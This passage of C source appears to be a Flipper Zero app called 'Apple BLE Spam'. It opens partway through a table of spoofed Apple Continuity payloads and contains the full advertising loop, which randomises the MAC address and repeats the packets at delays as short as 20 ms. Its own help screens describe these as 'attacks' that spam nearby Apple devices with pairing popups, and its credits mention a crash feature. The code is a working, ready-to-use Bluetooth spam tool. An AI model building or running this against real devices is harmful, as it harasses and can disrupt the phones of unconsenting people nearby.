{.proximity_pair = {.prefix = 0x01, .model = 0x1220}}, 638 | }}, 639 | {.title = "Beats Studio Buds+", 640 | .text = "Modal, spammy (auto close)", 641 | .random = false, 642 | .msg = 643 | { 644 | .type = ContinuityTypeProximityPair, 645 | .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1620}}, 646 | }}, 647 | }; 648 | 649 | #define PAYLOAD_COUNT ((signed)COUNT_OF(payloads)) 650 | 651 | struct { 652 | uint8_t count; 653 | ContinuityData** datas; 654 | } randoms[ContinuityTypeCount] = {0}; 655 | 656 | uint16_t delays[] = { 657 | 20, 658 | 50, 659 | 100, 660 | 150, 661 | 200, 662 | 300, 663 | 400, 664 | 500, 665 | 750, 666 | 1000, 667 | 1500, 668 | 2000, 669 | 2500, 670 | 3000, 671 | 4000, 672 | 5000, 673 | }; 674 | 675 | typedef struct { 676 | bool resume; 677 | bool advertising; 678 | uint8_t delay; 679 | uint8_t size; 680 | uint8_t* packet; 681 | Payload* payload; 682 | FuriThread* thread; 683 | uint8_t mac[GAP_MAC_ADDR_SIZE]; 684 | int8_t index; 685 | } State; 686 | 687 | static int32_t adv_thread(void* ctx) { 688 | State* state = ctx; 689 | Payload* payload = state->payload; 690 | ContinuityMsg* msg = &payload->msg; 691 | ContinuityType type = msg->type; 692 | 693 | while(state->advertising) { 694 | if(payload->random) { 695 | uint8_t random_i = rand() % randoms[type].count; 696 | memcpy(&msg->data, randoms[type].datas[random_i], sizeof(msg->data)); 697 | } 698 | continuity_generate_packet(msg, state->packet); 699 | napi_furi_hal_bt_custom_adv_set(state->packet, state->size); 700 | furi_thread_flags_wait(true, FuriFlagWaitAny, delays[state->delay]); 701 | } 702 | 703 | return 0; 704 | } 705 | 706 | static void stop_adv(State* state) { 707 | state->advertising = false; 708 | furi_thread_flags_set(furi_thread_get_id(state->thread), true); 709 | furi_thread_join(state->thread); 710 | napi_furi_hal_bt_custom_adv_stop(); 711 | } 712 | 713 | static void start_adv(State* state) { 714 | state->advertising = true; 715 | furi_thread_start(state->thread); 716 | uint16_t delay = delays[state->delay]; 717 | napi_furi_hal_bt_custom_adv_start(delay, delay, 0x00, state->mac, 0x1F); 718 | } 719 | 720 | static void toggle_adv(State* state, Payload* payload) { 721 | if(state->advertising) { 722 | stop_adv(state); 723 | if(state->resume) furi_hal_bt_start_advertising(); 724 | state->payload = NULL; 725 | free(state->packet); 726 | state->packet = NULL; 727 | state->size = 0; 728 | } else { 729 | state->size = continuity_get_packet_size(payload->msg.type); 730 | state->packet = malloc(state->size); 731 | state->payload = payload; 732 | furi_hal_random_fill_buf(state->mac, sizeof(state->mac)); 733 | state->resume = furi_hal_bt_is_active(); 734 | furi_hal_bt_stop_advertising(); 735 | start_adv(state); 736 | } 737 | } 738 | 739 | #define PAGE_MIN (-5) 740 | #define PAGE_MAX PAYLOAD_COUNT 741 | enum { 742 | PageApps = PAGE_MIN, 743 | PageDelay, 744 | PageDistance, 745 | PageProximityPair, 746 | PageNearbyAction, 747 | PageStart = 0, 748 | PageEnd = PAYLOAD_COUNT - 1, 749 | PageAbout = PAGE_MAX, 750 | }; 751 | 752 | static void draw_callback(Canvas* canvas, void* ctx) { 753 | State* state = ctx; 754 | const char* back = "Back"; 755 | const char* next = "Next"; 756 | switch(state->index) { 757 | case PageStart - 1: 758 | next = "Spam"; 759 | break; 760 | case PageStart: 761 | back = "Help"; 762 | break; 763 | case PageEnd: 764 | next = "About"; 765 | break; 766 | case PageEnd + 1: 767 | back = "Spam"; 768 | break; 769 | } 770 | 771 | canvas_set_font(canvas, FontSecondary); 772 | canvas_draw_icon(canvas, 3, 4, &I_apple_10px); 773 | canvas_draw_str(canvas, 14, 12, "Apple BLE Spam"); 774 | 775 | switch(state->index) { 776 | case PageApps: 777 | canvas_set_font(canvas, FontPrimary); 778 | canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Help"); 779 | elements_text_box( 780 | canvas, 781 | 4, 782 | 16, 783 | 120, 784 | 48, 785 | AlignLeft, 786 | AlignTop, 787 | "\e#Some Apps\e# interfere\n" 788 | "with the attacks, stay on\n" 789 | "homescreen for best results", 790 | false); 791 | break; 792 | case PageDelay: 793 | canvas_set_font(canvas, FontPrimary); 794 | canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Help"); 795 | elements_text_box( 796 | canvas, 797 | 4, 798 | 16, 799 | 120, 800 | 48, 801 | AlignLeft, 802 | AlignTop, 803 | "\e#Delay\e# is time between\n" 804 | "attack attempts (top right),\n" 805 | "keep 20ms for best results", 806 | false); 807 | break; 808 | case PageDistance: 809 | canvas_set_font(canvas, FontPrimary); 810 | canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Help"); 811 | elements_text_box( 812 | canvas, 813 | 4, 814 | 16, 815 | 120, 816 | 48, 817 | AlignLeft, 818 | AlignTop, 819 | "\e#Distance\e# is limited, attacks\n" 820 | "work under 1 meter but a\n" 821 | "few are marked 'long range'", 822 | false); 823 | break; 824 | case PageProximityPair: 825 | canvas_set_font(canvas, FontPrimary); 826 | canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Help"); 827 | elements_text_box( 828 | canvas, 829 | 4, 830 | 16, 831 | 120, 832 | 48, 833 | AlignLeft, 834 | AlignTop, 835 | "\e#Proximity Pair\e# attacks\n" 836 | "keep spamming but work at\n" 837 | "very close range", 838 | false); 839 | break; 840 | case PageNearbyAction: 841 | canvas_set_font(canvas, FontPrimary); 842 | canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Help"); 843 | elements_text_box( 844 | canvas, 845 | 4, 846 | 16, 847 | 120, 848 | 48, 849 | AlignLeft, 850 | AlignTop, 851 | "\e#Nearby Actions\e# work one\n" 852 | "time then need to lock and\n" 853 | "unlock the phone", 854 | false); 855 | break; 856 | case PageAbout: 857 | canvas_set_font(canvas, FontPrimary); 858 | canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "About"); 859 | elements_text_box( 860 | canvas, 861 | 4, 862 | 16, 863 | 122, 864 | 48, 865 | AlignLeft, 866 | AlignTop, 867 | "App+Spam by \e#WillyJL\e# XFW\n" 868 | "IDs and Crash by \e#ECTO-1A\e#\n" 869 | "Continuity by \e#furiousMAC\e#\n" 870 | " Version \e#1.2\e#", 871 | false); 872 | break; 873 | default: { 874 | if(state->index < 0 || state->index > PAYLOAD_COUNT - 1) break; 875 | const Payload* payload = &payloads[state->index]; 876 | char str[32]; 877 | 878 | canvas_set_font(canvas, FontPrimary); 879 | snprintf(str, sizeof(str), "%ims", delays[state->delay]); 880 | canvas_draw_str_aligned(canvas, 116, 12, AlignRight, AlignBottom, str); 881 | canvas_draw_icon(canvas, 119, 6, &I_SmallArrowUp_3x5); 882 | canvas_draw_icon(canvas, 119, 10, &I_SmallArrowDown_3x5); 883 | 884 | canvas_set_font(canvas, FontPrimary); 885 | snprintf( 886 | str, 887 | sizeof(str), 888 | "%02i/%02i: %s", 889 | state->index + 1, 890 | PAYLOAD_COUNT, 891 | continuity_get_type_name(payload->msg.type)); 892 | canvas_draw_str(canvas, 4 - (state->index < 19 ? 1 : 0), 24, str); 893 | 894 | canvas_set_font(canvas, FontPrimary); 895 | canvas_draw_str(canvas, 4, 34, payload->title); 896 | 897 | canvas_set_font(canvas, FontSecondary); 898 | canvas_draw_str(canvas, 4, 46, payload->text); 899 | 900 | elements_button_center(canvas, state->advertising ? "Stop" : "Start"); 901 | break; 902 | } 903 | } 904 | 905 | if(state->index > PAGE_MIN) { 906 | elements_button_left(canvas, back); 907 | } 908 | if(state->index < PAGE_MAX) { 909 | elements_button_right(canvas, next); 910 | } 911 | } 912 | 913 | static void input_callback(InputEvent* input, void* ctx) { 914 | FuriMessageQueue* input_queue = ctx; 915 | if(input->type == InputTypeShort || input->type == InputTypeLong || 916 | input->type == InputTypeRepeat) { 917 | furi_message_queue_put(input_queue, input, 0); 918 | } 919 | } 920 | 921 | int32_t apple_ble_spam(void* p) { 922 | UNUSED(p); 923 | for(uint8_t payload_i = 0; payload_i < COUNT_OF(payloads); payload_i++) { 924 | if(payloads[payload_i].random) continue; 925 | randoms[payloads[payload_i].msg.type].count++; 926 | } 927 | for(ContinuityType type = 0; type < ContinuityTypeCount; type++) { 928 | if(!randoms[type].count) continue; 929 | randoms[type].datas = malloc(sizeof(ContinuityData*) * randoms[type].count); 930 | uint8_t random_i = 0; 931 | for(uint8_t payload_i = 0; payload_i < COUNT_OF(payloads); payload_i++) { 932 | if(payloads[payload_i].random) continue; 933 | if(payloads[payload_i].msg.type == type) { 934 | randoms[type].datas[random_i++] = &payloads[payload_i].msg.data; 935 | } 936 | } 937 | } 938 | 939 | State* state = malloc(sizeof(State)); 940 | state->thread = furi_thread_alloc(); 941 | furi_thread_set_callback(state->thread, adv_thread); 942 | furi_thread_set_context(state->thread, state); 943 | furi_thread_set_stack_size(state->thread, 2048); 944 | 945 | FuriMessageQueue* input_queue = furi_message_queue_alloc(8, sizeof(InputEvent)); 946 | ViewPort* view_port = view_port_alloc(); 947 | Gui* gui = furi_record_open(RECORD_GUI); 948 | view_port_input_callback_set(view_port, input_callback, input_queue); 949 | view_port_draw_callback_set(view_port, draw_callback, state); 950 | gui_add_view_port(gui, view_port, GuiLayerFullscreen); 951 | 952 | bool running = true; 953 | napi_hci_send_req = (int (*)(struct hci_request*, uint8_t))( 954 | (uintptr_t)(scan_memory_for_sequence(TARGET_SEQUENCE)) | 0x01); 955 | while(running) { 956 | InputEvent input; 957 | furi_check(furi_message_queue_get(input_queue, &input, FuriWaitForever) == FuriStatusOk); 958 | 959 | Payload* payload = (state->index >= 0 && state->index <= PAYLOAD_COUNT - 1) ? 960 | &payloads[state->index] : 961 | NULL; 962 | bool advertising = state->advertising; 963 | switch(input.key) { 964 | case InputKeyOk: 965 | if(payload) toggle_adv(state, payload); 966 | break; 967 | case InputKeyUp: 968 | if(payload && state->delay < COUNT_OF(delays) - 1) { 969 | if(advertising) stop_adv(state); 970 | state->delay++; 971 | if(advertising) start_adv(state); 972 | } 973 | break; 974 | case InputKeyDown: 975 | if(payload && state->delay > 0) { 976 | if(advertising) stop_adv(state); 977 | state->delay--; 978 | if(advertising) start_adv(state); 979 | } 980 | break; 981 | case InputKeyLeft: 982 | if(state->index > PAGE_MIN) { 983 | if(advertising) toggle_adv(state, payload); 984 | state->index--; 985 | } 986 | break; 987 | case InputKeyRight: 988 | if(state->index < PAGE_MAX) { 989 | if(advertising) toggle_adv(state, payload); 990 | state->index++; 991 | } 992 | break; 993 | case InputKeyBack: 994 | if(advertising) toggle_adv(state, payload); 995 | running = false; 996 | break; 997 | default: 998 | continue; 999 | } 1000 | 1001 | view_port_update(view_port); 1002 | } 1003 | 1004 | gui_remove_view_port(gui, view_port); 1005 | furi_record_close(RECORD_GUI); 1006 | view_port_free(view_port); 1007 | furi_message_queue_free(input_queue); 1008 | 1009 | furi_thread_free(state->thread); 1010 | free(state); 1011 | 1012 | for(ContinuityType type = 0; type < ContinuityTypeCount; type++) { 1013 | free(randoms[type].datas); 1014 | } 1015 | return 0; 1016 | } 1017 | --------------------------------------------------------------------------------